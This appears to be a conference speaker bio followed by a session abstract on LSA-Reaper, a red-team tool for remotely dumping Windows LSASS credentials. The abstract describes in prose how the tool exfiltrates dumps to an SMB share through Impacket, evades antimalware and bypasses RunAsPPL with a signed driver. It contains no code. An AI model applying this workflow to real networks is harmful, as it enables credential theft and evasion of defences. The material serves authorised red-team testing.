Daniel Cornett
Daniel Cornett is a recent graduate from the University of North Georgia receiving a Bachelor of Science in Cybersecurity. Daniel has already been working in the private sector for a little over a year and in that time has passed both the CEH and GSEC exams. Daniel has a passion for coding which has led him to create multiple tools that are using in red team engagements.
Session
LSA-Reaper is an advanced and versatile command line tool designed to facilitate remote dumping of the process. By using Impacket's wmiexec, smbexec, or atexec tools.
The initial step of LSA-Reaper involves conducting a ping sweep across the provided IP addresses or IP ranges. This reconnaissance enables the tool to identify live hosts to prevent timeouts. Once the live hosts are successfully detected, LSA-Reaper proceeds to create an SMB share with a randomly generated username and password. This SMB share serves as the exfiltration point for LSASS dump and as the host for the payloads. Ensuring that the payloads are never written to disk on the Windows hosts.
LSA-Reaper then runs the net use command on the victim’s machine through Impacket’s wmiexec, smbexec, or atexec, LSA-Reaper orchestrates the mounting of the previously created SMB share as a network drive on the target system. This critical step facilitates data transfer and enhances the overall effectiveness of the LSASS extraction process.
The final stage entails the execution of the selected payload such as msbuild, regsvr32, calc.exe, or an EXE file. By employing these utilities, LSA-Reaper successfully extracts the LSASS data and directly saves it to the mounted SMB share. This approach offers an added advantage as it bypasses Windows antimalware systems that may attempt to delete or interfere with the LSASS dump file.
Finally, LSA-Reaper includes a feature that will automatically bypass the RunAsPPL security feature by leveraging a signed driver that comes bundled with MSIAfterburner to elevate the payload’s process to a PPL with the LSA signature enabling the payload process to interact with the LSASS process without modifying the security level of the LSASS process.